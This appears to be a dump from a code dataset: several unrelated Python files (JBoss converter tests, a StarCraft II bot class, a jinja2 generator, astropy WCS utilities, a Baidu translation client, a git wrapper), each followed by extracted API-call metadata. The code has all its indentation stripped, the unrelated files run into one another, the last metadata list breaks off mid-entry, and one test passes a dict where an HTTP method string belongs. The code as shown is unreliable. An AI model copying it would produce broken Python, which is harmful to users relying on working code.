desired_operation = {"operation": "resource", "address": "/subsystem/undertow/server/default-server"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_empty_params_http_get(self):
"""See if command with path, operation, and single param return correctly using HTTP GET"""
test_data = '/subsystem=undertow/server=default-server:read-resource()'
desired_operation = {"operation": "resource", "address": "/subsystem/undertow/server/default-server"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_single_param_http_get(self):
"""See if command with path, operation, and single param return correctly using HTTP GET"""
test_data = '/subsystem=undertow/server=default-server:read-attribute(name=default-host)'
desired_operation = {
"operation": "attribute", "name": "default-host",
"address": "/subsystem/undertow/server/default-server"
}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_multiple_param_http_get(self):
"""See if command with multiple pathresult, operation, and multiple param return correctly using HTTP GET"""
test_data = '/subsystem=undertow/server=default-server:read-attribute(resolve-expressions=true,include-defaults=true,name=servlet-container)'
desired_operation = {
"operation": "attribute", "resolve-expressions": "true", "include-defaults": "true",
"name": "servlet-container", "address": "/subsystem/undertow/server/default-server"
}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
class TestJBOSSCommandToHTTPPOSTRequestTestCase(unittest.TestCase):
"""Test case for for convert.jboss_command_to_http_request"""
def test_single_path_and_operation_no_params_http_post(self):
"""See if command with path and operation returns correctly using HTTP POST"""
test_data = '/core-service=management:whoami'
desired_operation = {"operation": "whoami", "address": ["core-service", "management"]}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_single_path_and_operation_single_param_http_post(self):
"""See if command with path, operation, and single param return correctly using HTTP POST"""
test_data = '/core-service=server-environment:path-info(unit=GIGABYTES)'
desired_operation = {
"operation": "path-info", "unit": "GIGABYTES",
"address": ["core-service", "server-environment"]
}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_single_path_and_operation_multiple_params_http_post(self):
"""See if command with path, operation, and multiple params return correctly using HTTP POST"""
test_data = '/subsystem=undertow:write-attribute(name=statistics-enabled,value=true)'
desired_operation = {
"operation": "write-attribute", "name": "statistics-enabled", "value": "true",
"address": ["subsystem", "undertow"]
}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_no_params_http_post(self):
"""See if command with multiple pathresult, operation, and single param return correctly using HTTP POST"""
test_data = "/subsystem=datasources/data-source=ExampleDS:dump-queued-threads-in-pool()"
desired_operation = {
"operation": "dump-queued-threads-in-pool",
"address": ["subsystem", "datasources", "data-source", "ExampleDS"]
}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_single_param_http_post(self):
"""See if command with multiple pathresult, operation, and single param return correctly using HTTP POST"""
test_data = "/core-service=management/service=configuration-changes:add(max-history=200)"
desired_operation = {
"operation": "add", "max-history": "200",
"address": ["core-service", "management", "service", "configuration-changes"]
}
result = jboss_command_to_http_request(test_data, desired_operation)
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_multiple_param_http_post(self):
"""See if command with multiple pathresult, operation, and multiple params return correctly using HTTP POST"""
test_data = "/subsystem=datasources/data-source=ExampleDS:write-attribute(name=max-pool-size,value=5000)"
desired_operation = {
"operation": "write-attribute", "name": "max-pool-size", "value": "5000",
"address": ["subsystem", "datasources", "data-source", "ExampleDS"]
}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"convert.jboss_command_to_http_request"
] | [((10959, 10974), 'unittest.main', 'unittest.main', ([], {}), '()\n', (10972, 10974), False, 'import unittest\n'), ((489, 536), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (518, 536), False, 'from convert import jboss_command_to_http_request\n'), ((854, 901), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (883, 901), False, 'from convert import jboss_command_to_http_request\n'), ((1271, 1318), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (1300, 1318), False, 'from convert import jboss_command_to_http_request\n'), ((1719, 1766), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (1748, 1766), False, 'from convert import jboss_command_to_http_request\n'), ((2251, 2299), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (2280, 2299), False, 'from convert import jboss_command_to_http_request\n'), ((2624, 2672), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (2653, 2672), False, 'from convert import jboss_command_to_http_request\n'), ((3044, 3092), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (3073, 3092), False, 'from convert import jboss_command_to_http_request\n'), ((3524, 3572), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (3553, 3572), False, 'from convert import jboss_command_to_http_request\n'), ((4075, 4122), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (4104, 4122), False, 'from convert import jboss_command_to_http_request\n'), ((4587, 4634), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (4616, 4634), False, 'from convert import jboss_command_to_http_request\n'), ((5158, 5205), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (5187, 5205), False, 'from convert import jboss_command_to_http_request\n'), ((5632, 5679), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (5661, 5679), False, 'from convert import jboss_command_to_http_request\n'), ((6111, 6158), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (6140, 6158), False, 'from convert import jboss_command_to_http_request\n'), ((6667, 6714), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (6696, 6714), False, 'from convert import jboss_command_to_http_request\n'), ((7358, 7405), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (7387, 7405), False, 'from convert import jboss_command_to_http_request\n'), ((7915, 7963), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (7944, 7963), False, 'from convert import jboss_command_to_http_request\n'), ((8447, 8495), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (8476, 8495), False, 'from convert import jboss_command_to_http_request\n'), ((9017, 9065), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (9046, 9065), False, 'from convert import jboss_command_to_http_request\n'), ((9594, 9642), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (9623, 9642), False, 'from convert import jboss_command_to_http_request\n'), ((10182, 10241), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', 'desired_operation'], {}), '(test_data, desired_operation)\n', (10211, 10241), False, 'from convert import jboss_command_to_http_request\n'), ((10825, 10873), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (10854, 10873), False, 'from convert import jboss_command_to_http_request\n')] |
from sc2.ids.effect_id import EffectId
from sc2.position import Point2
from sc2.units import Units
from sharpy.managers.combat2 import MicroStep, Action, MoveType
from sc2 import AbilityId
from sc2.unit import Unit
class MicroVoidrays(MicroStep):
def should_retreat(self, unit: Unit) -> bool:
if unit.shield_max + unit.health_max > 0:
health_percentage = (unit.shield + unit.health) / (unit.shield_max + unit.health_max)
else:
health_percentage = 0
if health_percentage < 0.2 or unit.weapon_cooldown < 0:
# low hp or unit can't attack
return True
for effect in self.ai.state.effects:
if effect.id == EffectId.RAVAGERCORROSIVEBILECP:
if Point2.center(effect.positions).distance_to(unit) < 3:
return True
if effect.id == EffectId.BLINDINGCLOUDCP:
if Point2.center(effect.positions).distance_to(unit) < 4:
return True
if effect.id == EffectId.PSISTORMPERSISTENT:
if Point2.center(effect.positions).distance_to(unit) < 4:
return True
return False
def group_solve_combat(self, units: Units, current_command: Action) -> Action:
return current_command
def unit_solve_combat(self, unit: Unit, current_command: Action) -> Action:
if self.engage_ratio < 0.25 and self.can_engage_ratio < 0.25:
return current_command
if self.move_type in {MoveType.PanicRetreat, MoveType.DefensiveRetreat}:
return current_command
if self.cd_manager.is_ready(unit.tag, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT):
close_enemies = self.cache.enemy_in_range(unit.position, 7).filter(lambda u: u.is_armored)
if close_enemies:
return Action(None, False, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT)
if not self.should_shoot() and self.should_retreat(unit):
pos = self.pather.find_weak_influence_air(unit.position, 4)
return Action(pos, False)
return self.focus_fire(unit, current_command, None)
def should_shoot(self):
tick = self.ai.state.game_loop % 24
return tick < 8
| [
"sharpy.managers.combat2.Action",
"sc2.position.Point2.center"
] | [((2070, 2088), 'sharpy.managers.combat2.Action', 'Action', (['pos', '(False)'], {}), '(pos, False)\n', (2076, 2088), False, 'from sharpy.managers.combat2 import MicroStep, Action, MoveType\n'), ((1848, 1911), 'sharpy.managers.combat2.Action', 'Action', (['None', '(False)', 'AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT'], {}), '(None, False, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT)\n', (1854, 1911), False, 'from sharpy.managers.combat2 import MicroStep, Action, MoveType\n'), ((751, 782), 'sc2.position.Point2.center', 'Point2.center', (['effect.positions'], {}), '(effect.positions)\n', (764, 782), False, 'from sc2.position import Point2\n'), ((911, 942), 'sc2.position.Point2.center', 'Point2.center', (['effect.positions'], {}), '(effect.positions)\n', (924, 942), False, 'from sc2.position import Point2\n'), ((1074, 1105), 'sc2.position.Point2.center', 'Point2.center', (['effect.positions'], {}), '(effect.positions)\n', (1087, 1105), False, 'from sc2.position import Point2\n')] |
#
# Copyright (c) 2019 EXXETA AG and others.
#
# This file is part of k8s-python-tools
# (see https://github.com/EXXETA/k8s-python-tools).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import re
from jinja2 import Environment, FileSystemLoader
"""load self-defined generated_library.yml and use this information to generate api methods.
using jinja2 templating engine to generate python files
"""
__location__ = os.path.join(os.getcwd(), os.path.dirname(__file__))
try:
from yaml import CLoader as Loader, CDumper as Dumper, load
except ImportError:
from yaml import Loader, Dumper
text_io = open(os.path.join(__location__, 'generated_library.yml'), 'r')
data = load(text_io, Loader=Loader)
text_io.close()
env = Environment(
loader=FileSystemLoader(os.path.join(__location__, "templates")),
# autoescape=select_autoescape(['html'])
)
def camelcase_to_snake_case(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
env.filters['normalize'] = camelcase_to_snake_case
# generating api methods
for i in data["lib_def"]:
file_name = data["lib_def"][i]["file"]
template_name = data["lib_def"][i]["template"]
entries = data["lib_def"][i]["entries"]
print("generated", "./lib/" + file_name)
template = env.get_template(template_name)
rendered = template.render(entries=entries)
f = open(os.path.join(__location__, "./lib/" + file_name), "w")
f.write(rendered)
f.close()
# generating api actions
for i in data["actions"]:
base_path = data["actions"][i]["destination"]
template_name = data["actions"][i]["template"]
entries = data["actions"][i]["entries"]
print("auto-generated", len(entries), "actions in destination", base_path)
template = env.get_template(template_name)
for item in entries:
rendered = template.render(item=item)
f = open(os.path.join(__location__, "./lib/" + base_path + "/" +
camelcase_to_snake_case(item["name"]) + ".py"), "w")
f.write(rendered)
f.close()
print("OK")
| [
"os.path.join",
"yaml.load",
"os.getcwd",
"os.path.dirname",
"re.sub"
] | [((1431, 1459), 'yaml.load', 'load', (['text_io'], {'Loader': 'Loader'}), '(text_io, Loader=Loader)\n', (1435, 1459), False, 'from yaml import CLoader as Loader, CDumper as Dumper, load\n'), ((1184, 1195), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1193, 1195), False, 'import os\n'), ((1197, 1222), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1212, 1222), False, 'import os\n'), ((1366, 1417), 'os.path.join', 'os.path.join', (['__location__', '"""generated_library.yml"""'], {}), "(__location__, 'generated_library.yml')\n", (1378, 1417), False, 'import os\n'), ((1659, 1702), 're.sub', 're.sub', (['"""(.)([A-Z][a-z]+)"""', '"""\\\\1_\\\\2"""', 'name'], {}), "('(.)([A-Z][a-z]+)', '\\\\1_\\\\2', name)\n", (1665, 1702), False, 'import re\n'), ((2162, 2210), 'os.path.join', 'os.path.join', (['__location__', "('./lib/' + file_name)"], {}), "(__location__, './lib/' + file_name)\n", (2174, 2210), False, 'import os\n'), ((1524, 1563), 'os.path.join', 'os.path.join', (['__location__', '"""templates"""'], {}), "(__location__, 'templates')\n", (1536, 1563), False, 'import os\n'), ((1713, 1755), 're.sub', 're.sub', (['"""([a-z0-9])([A-Z])"""', '"""\\\\1_\\\\2"""', 's1'], {}), "('([a-z0-9])([A-Z])', '\\\\1_\\\\2', s1)\n", (1719, 1755), False, 'import re\n')] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""WCS related utility functions."""
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from astropy.wcs import WCS
from astropy.coordinates import Angle
__all__ = [
'linear_wcs_to_arrays',
'linear_arrays_to_wcs',
'get_wcs_ctype',
'get_resampled_wcs'
]
def get_wcs_ctype(wcs):
"""
Get celestial coordinate type of WCS instance.
Parameters
----------
wcs : `~astropy.wcs.WCS`
WCS transformation instance.
Returns
-------
ctype : {'galatic', 'icrs'}
String specifying the coordinate type, that can be used with
`~astropy.coordinates.SkyCoord`
"""
ctype = wcs.wcs.ctype
if 'GLON' in ctype[0] or 'GLON' in ctype[1]:
return 'galactic'
elif 'RA' in ctype[0] or 'RA' in ctype[1]:
return 'icrs'
else:
raise TypeError("Can't determine WCS coordinate type.")
def get_resampled_wcs(wcs, factor, downsampled):
"""
Get resampled WCS object.
"""
wcs = wcs.deepcopy()
if not downsampled:
factor = 1. / factor
wcs.wcs.cdelt *= factor
wcs.wcs.crpix = (wcs.wcs.crpix - 0.5) / factor + 0.5
return wcs
def linear_wcs_to_arrays(wcs, nbins_x, nbins_y):
"""Make a 2D linear binning from a WCS object.
This method gives the correct answer only for linear X, Y binning.
The method expects angular quantities in the WCS object.
X is identified with WCS axis 1, Y is identified with WCS axis 2.
The method needs the number of bins as input, since it is not in
the WCS object.
Parameters
----------
wcs : `~astropy.wcs.WCS`
WCS object describing the bin coordinates
nbins_x : int
number of bins in X coordinate
nbins_y : int
number of bins in Y coordinate
Returns
-------
bin_edges_x : `~astropy.coordinates.Angle`
array with the bin edges for the X coordinate
bin_edges_y : `~astropy.coordinates.Angle`
array with the bin edges for the Y coordinate
"""
# check number of dimensions
if wcs.wcs.naxis != 2:
raise ValueError("Expected exactly 2 dimensions, got {}"
.format(wcs.wcs.naxis))
# check that wcs axes are linear
# TODO: is there an easy way to do this?
# set bins
unit_x, unit_y = wcs.wcs.cunit
delta_x, delta_y = wcs.wcs.cdelt
delta_x = Angle(delta_x, unit_x)
delta_y = Angle(delta_y, unit_y)
bin_edges_x = np.arange(nbins_x + 1) * delta_x
bin_edges_y = np.arange(nbins_y + 1) * delta_y
# translate bins to correct values according to WCS reference
# In FITS, the edge of the image is at pixel coordinate +0.5.
refpix_x, refpix_y = wcs.wcs.crpix
refval_x, refval_y = wcs.wcs.crval
refval_x = Angle(refval_x, unit_x)
refval_y = Angle(refval_y, unit_y)
bin_edges_x += refval_x - (refpix_x - 0.5) * delta_x
bin_edges_y += refval_y - (refpix_y - 0.5) * delta_y
# set small values (compared to delta (i.e. step)) to 0
for i in np.arange(len(bin_edges_x)):
if np.abs(bin_edges_x[i] / delta_x) < 1.e-10:
bin_edges_x[i] = Angle(0., unit_x)
for i in np.arange(len(bin_edges_y)):
if np.abs(bin_edges_y[i] / delta_y) < 1.e-10:
bin_edges_y[i] = Angle(0., unit_y)
return bin_edges_x, bin_edges_y
def linear_arrays_to_wcs(name_x, name_y, bin_edges_x, bin_edges_y):
"""Make a 2D linear WCS object from arrays of bin edges.
This method gives the correct answer only for linear X, Y binning.
X is identified with WCS axis 1, Y is identified with WCS axis 2.
Parameters
----------
name_x : str
name of X coordinate, to be used as 'CTYPE' value
name_y : str
name of Y coordinate, to be used as 'CTYPE' value
bin_edges_x : `~astropy.coordinates.Angle`
array with the bin edges for the X coordinate
bin_edges_y : `~astropy.coordinates.Angle`
array with the bin edges for the Y coordinate
Returns
-------
wcs : `~astropy.wcs.WCS`
WCS object describing the bin coordinates
"""
# check units
unit_x = bin_edges_x.unit
unit_y = bin_edges_y.unit
if unit_x != unit_y:
ss_error = "Units of X ({0}) and Y ({1}) bins do not match!".format(
unit_x, unit_y)
ss_error += " Is this expected?"
raise ValueError(ss_error)
# Create a new WCS object. The number of axes must be set from the start
wcs = WCS(naxis=2)
# Set up DET coordinates in degrees
nbins_x = len(bin_edges_x) - 1
nbins_y = len(bin_edges_y) - 1
range_x = Angle([bin_edges_x[0], bin_edges_x[-1]])
range_y = Angle([bin_edges_y[0], bin_edges_y[-1]])
delta_x = (range_x[1] - range_x[0]) / nbins_x
delta_y = (range_y[1] - range_y[0]) / nbins_y
wcs.wcs.ctype = [name_x, name_y]
wcs.wcs.cunit = [unit_x, unit_y]
wcs.wcs.cdelt = [delta_x.to(unit_x).value, delta_y.to(unit_y).value]
# ref as lower left corner (start of (X, Y) bin coordinates)
# coordinate start at pix = 0.5
wcs.wcs.crpix = [0.5, 0.5]
wcs.wcs.crval = [(bin_edges_x[0] + (wcs.wcs.crpix[0] - 0.5) * delta_x).to(unit_x).value,
(bin_edges_y[0] + (wcs.wcs.crpix[1] - 0.5) * delta_y).to(unit_y).value]
return wcs
| [
"numpy.abs",
"astropy.wcs.WCS",
"numpy.arange",
"astropy.coordinates.Angle"
] | [((2472, 2494), 'astropy.coordinates.Angle', 'Angle', (['delta_x', 'unit_x'], {}), '(delta_x, unit_x)\n', (2477, 2494), False, 'from astropy.coordinates import Angle\n'), ((2509, 2531), 'astropy.coordinates.Angle', 'Angle', (['delta_y', 'unit_y'], {}), '(delta_y, unit_y)\n', (2514, 2531), False, 'from astropy.coordinates import Angle\n'), ((2859, 2882), 'astropy.coordinates.Angle', 'Angle', (['refval_x', 'unit_x'], {}), '(refval_x, unit_x)\n', (2864, 2882), False, 'from astropy.coordinates import Angle\n'), ((2898, 2921), 'astropy.coordinates.Angle', 'Angle', (['refval_y', 'unit_y'], {}), '(refval_y, unit_y)\n', (2903, 2921), False, 'from astropy.coordinates import Angle\n'), ((4560, 4572), 'astropy.wcs.WCS', 'WCS', ([], {'naxis': '(2)'}), '(naxis=2)\n', (4563, 4572), False, 'from astropy.wcs import WCS\n'), ((4698, 4738), 'astropy.coordinates.Angle', 'Angle', (['[bin_edges_x[0], bin_edges_x[-1]]'], {}), '([bin_edges_x[0], bin_edges_x[-1]])\n', (4703, 4738), False, 'from astropy.coordinates import Angle\n'), ((4753, 4793), 'astropy.coordinates.Angle', 'Angle', (['[bin_edges_y[0], bin_edges_y[-1]]'], {}), '([bin_edges_y[0], bin_edges_y[-1]])\n', (4758, 4793), False, 'from astropy.coordinates import Angle\n'), ((2550, 2572), 'numpy.arange', 'np.arange', (['(nbins_x + 1)'], {}), '(nbins_x + 1)\n', (2559, 2572), True, 'import numpy as np\n'), ((2601, 2623), 'numpy.arange', 'np.arange', (['(nbins_y + 1)'], {}), '(nbins_y + 1)\n', (2610, 2623), True, 'import numpy as np\n'), ((3150, 3182), 'numpy.abs', 'np.abs', (['(bin_edges_x[i] / delta_x)'], {}), '(bin_edges_x[i] / delta_x)\n', (3156, 3182), True, 'import numpy as np\n'), ((3222, 3240), 'astropy.coordinates.Angle', 'Angle', (['(0.0)', 'unit_x'], {}), '(0.0, unit_x)\n', (3227, 3240), False, 'from astropy.coordinates import Angle\n'), ((3293, 3325), 'numpy.abs', 'np.abs', (['(bin_edges_y[i] / delta_y)'], {}), '(bin_edges_y[i] / delta_y)\n', (3299, 3325), True, 'import numpy as np\n'), ((3365, 3383), 'astropy.coordinates.Angle', 'Angle', (['(0.0)', 'unit_y'], {}), '(0.0, unit_y)\n', (3370, 3383), False, 'from astropy.coordinates import Angle\n')] |
import yaml
from merceedge.exceptions import MerceEdgeError
from merceedge.settings import (
logger_access,
logger_code,
logger_console
)
_LOGGER = logger_code
def load_yaml(fname):
"""Load a YAML file."""
try:
with open(fname, encoding='utf-8') as conf_file:
# If configuration file is empty YAML returns None
# We convert that to an empty dict
return yaml.safe_load(conf_file) or {}
except yaml.YAMLError:
error = 'Error reading YAML configuration file {}'.format(fname)
_LOGGER.exception(error)
raise MerceEdgeError(error)
def write_yaml(fname, yaml_dict):
"""Write a yaml file from dict"""
try:
with open(fname, 'w', encoding='utf-8') as outfile:
yaml.dump(yaml_dict, outfile, default_flow_style=False)
except yaml.YAMLError:
error = 'Error write YAML configuration file {}'.format(fname)
_LOGGER.exception(error)
raise MerceEdgeError(error)
| [
"merceedge.exceptions.MerceEdgeError",
"yaml.safe_load",
"yaml.dump"
] | [((599, 620), 'merceedge.exceptions.MerceEdgeError', 'MerceEdgeError', (['error'], {}), '(error)\n', (613, 620), False, 'from merceedge.exceptions import MerceEdgeError\n'), ((776, 831), 'yaml.dump', 'yaml.dump', (['yaml_dict', 'outfile'], {'default_flow_style': '(False)'}), '(yaml_dict, outfile, default_flow_style=False)\n', (785, 831), False, 'import yaml\n'), ((977, 998), 'merceedge.exceptions.MerceEdgeError', 'MerceEdgeError', (['error'], {}), '(error)\n', (991, 998), False, 'from merceedge.exceptions import MerceEdgeError\n'), ((420, 445), 'yaml.safe_load', 'yaml.safe_load', (['conf_file'], {}), '(conf_file)\n', (434, 445), False, 'import yaml\n')] |
import random
import hashlib
import requests
from cctrans import conf
import cctrans
def _sign(app_key, secret_key, text):
salt = random.randint(32768, 65536)
sign = app_key + text + str(salt) + secret_key
return hashlib.md5(sign.encode('utf8')).hexdigest(), salt
def _request_data(url, app_key, text, salt, sign, from_lang='en', to_lang='zh'):
"""
:rtype: object
"""
return "{url}?appid={app_key}&q={text}&from={from_lang}&to={to_lang}&salt={salt}&sign={sign}".format(
**locals()
)
def translation(text, url):
app_key = conf.baidu_app_id
secret_key = conf.baidu_secret_key
sign, salt = _sign(app_key, secret_key, text)
data = _request_data(url=url,
app_key=app_key,
text=text,
salt=salt,
sign=sign,
from_lang=cctrans.from_lang,
to_lang=cctrans.to_lang)
resp = requests.get(data).json()
if resp.get('trans_result'):
trans_result = resp['trans_result']
trans_result = [trans_content['dst'] for trans_content in trans_result]
return trans_result
else:
return None
| [
"random.randint",
"requests.get"
] | [((137, 165), 'random.randint', 'random.randint', (['(32768)', '(65536)'], {}), '(32768, 65536)\n', (151, 165), False, 'import random\n'), ((979, 997), 'requests.get', 'requests.get', (['data'], {}), '(data)\n', (991, 997), False, 'import requests\n')] |
import os
import sys
from time import sleep
from typing import Optional
from joint_teapot.utils.logger import logger
current_path = sys.path[0]
sys.path.remove(current_path)
from git import Repo
from git.exc import GitCommandError
sys.path.insert(0, current_path)
from joint_teapot.config import settings
class Git:
def __init__(
self,
org_name: str = settings.gitea_org_name,
repos_dir: str = settings.repos_dir,
):
self.org_name = org_name
if not os.path.isdir(repos_dir):
raise Exception(f"{repos_dir} does not exist! Create it first.")
self.repos_dir = repos_dir
logger.debug("Git initialized")
def clone_repo(
self, repo_name: str, branch: str = "master", auto_retry: bool = True
) -> Optional[Repo]:
repo = None
repo_dir = os.path.join(self.repos_dir, repo_name)
retry_interval = 2
while retry_interval and auto_retry:
try:
repo = Repo.clone_from(
f"ssh://git@focs.ji.sjtu.edu.cn:2222/{self.org_name}/{repo_name}.git",
repo_dir,
branch=branch,
)
retry_interval = 0
except GitCommandError as e:
if "Connection refused" in e.stderr or "Connection reset" in e.stderr:
logger.warning(
f"{repo_name} connection refused/reset in clone. "
"Probably by JI firewall."
)
logger.info(f"wait for {retry_interval} seconds to retry...")
sleep(retry_interval)
if retry_interval < 64:
retry_interval *= 2
elif f"Remote branch {branch} not found in upstream origin" in e.stderr:
retry_interval = 0
logger.error(f"{repo_name} origin/{branch} not found")
else:
raise
return repo
def get_repo(self, repo_name: str) -> Optional[Repo]:
repo_dir = os.path.join(self.repos_dir, repo_name)
if os.path.exists(repo_dir):
return Repo(repo_dir)
return self.clone_repo(repo_name)
def repo_clean_and_checkout(
self, repo_name: str, checkout_dest: str, auto_retry: bool = True
) -> str:
repo_dir = os.path.join(self.repos_dir, repo_name)
repo = self.get_repo(repo_name)
if not repo:
return repo_dir
retry_interval = 2
while retry_interval and auto_retry:
try:
repo.git.fetch("--tags", "--all", "-f")
repo.git.reset("--hard", "origin/master")
repo.git.clean("-d", "-f", "-x")
repo.git.checkout(checkout_dest)
retry_interval = 0
except GitCommandError as e:
if "Connection refused" in e.stderr or "Connection reset" in e.stderr:
logger.warning(
f"{repo_name} connection refused/reset in fetch. "
"Probably by JI firewall."
)
logger.info(f"wait for {retry_interval} seconds to retry...")
sleep(retry_interval)
if retry_interval < 64:
retry_interval *= 2
elif "Remote branch master not found in upstream origin" in e.stderr:
retry_interval = 0
logger.error(f"{repo_name} origin/master not found")
else:
raise
return repo_dir
| [
"os.path.exists",
"joint_teapot.utils.logger.logger.warning",
"sys.path.insert",
"git.Repo.clone_from",
"os.path.join",
"git.Repo",
"time.sleep",
"sys.path.remove",
"os.path.isdir",
"joint_teapot.utils.logger.logger.error",
"joint_teapot.utils.logger.logger.info",
"joint_teapot.utils.logger.lo... | [((146, 175), 'sys.path.remove', 'sys.path.remove', (['current_path'], {}), '(current_path)\n', (161, 175), False, 'import sys\n'), ((234, 266), 'sys.path.insert', 'sys.path.insert', (['(0)', 'current_path'], {}), '(0, current_path)\n', (249, 266), False, 'import sys\n'), ((649, 680), 'joint_teapot.utils.logger.logger.debug', 'logger.debug', (['"""Git initialized"""'], {}), "('Git initialized')\n", (661, 680), False, 'from joint_teapot.utils.logger import logger\n'), ((844, 883), 'os.path.join', 'os.path.join', (['self.repos_dir', 'repo_name'], {}), '(self.repos_dir, repo_name)\n', (856, 883), False, 'import os\n'), ((2095, 2134), 'os.path.join', 'os.path.join', (['self.repos_dir', 'repo_name'], {}), '(self.repos_dir, repo_name)\n', (2107, 2134), False, 'import os\n'), ((2146, 2170), 'os.path.exists', 'os.path.exists', (['repo_dir'], {}), '(repo_dir)\n', (2160, 2170), False, 'import os\n'), ((2389, 2428), 'os.path.join', 'os.path.join', (['self.repos_dir', 'repo_name'], {}), '(self.repos_dir, repo_name)\n', (2401, 2428), False, 'import os\n'), ((503, 527), 'os.path.isdir', 'os.path.isdir', (['repos_dir'], {}), '(repos_dir)\n', (516, 527), False, 'import os\n'), ((2191, 2205), 'git.Repo', 'Repo', (['repo_dir'], {}), '(repo_dir)\n', (2195, 2205), False, 'from git import Repo\n'), ((996, 1116), 'git.Repo.clone_from', 'Repo.clone_from', (['f"""ssh://git@focs.ji.sjtu.edu.cn:2222/{self.org_name}/{repo_name}.git"""', 'repo_dir'], {'branch': 'branch'}), "(\n f'ssh://git@focs.ji.sjtu.edu.cn:2222/{self.org_name}/{repo_name}.git',\n repo_dir, branch=branch)\n", (1011, 1116), False, 'from git import Repo\n'), ((1370, 1465), 'joint_teapot.utils.logger.logger.warning', 'logger.warning', (['f"""{repo_name} connection refused/reset in clone. Probably by JI firewall."""'], {}), "(\n f'{repo_name} connection refused/reset in clone. Probably by JI firewall.')\n", (1384, 1465), False, 'from joint_teapot.utils.logger import logger\n'), ((1554, 1615), 'joint_teapot.utils.logger.logger.info', 'logger.info', (['f"""wait for {retry_interval} seconds to retry..."""'], {}), "(f'wait for {retry_interval} seconds to retry...')\n", (1565, 1615), False, 'from joint_teapot.utils.logger import logger\n'), ((1636, 1657), 'time.sleep', 'sleep', (['retry_interval'], {}), '(retry_interval)\n', (1641, 1657), False, 'from time import sleep\n'), ((3002, 3097), 'joint_teapot.utils.logger.logger.warning', 'logger.warning', (['f"""{repo_name} connection refused/reset in fetch. Probably by JI firewall."""'], {}), "(\n f'{repo_name} connection refused/reset in fetch. Probably by JI firewall.')\n", (3016, 3097), False, 'from joint_teapot.utils.logger import logger\n'), ((3186, 3247), 'joint_teapot.utils.logger.logger.info', 'logger.info', (['f"""wait for {retry_interval} 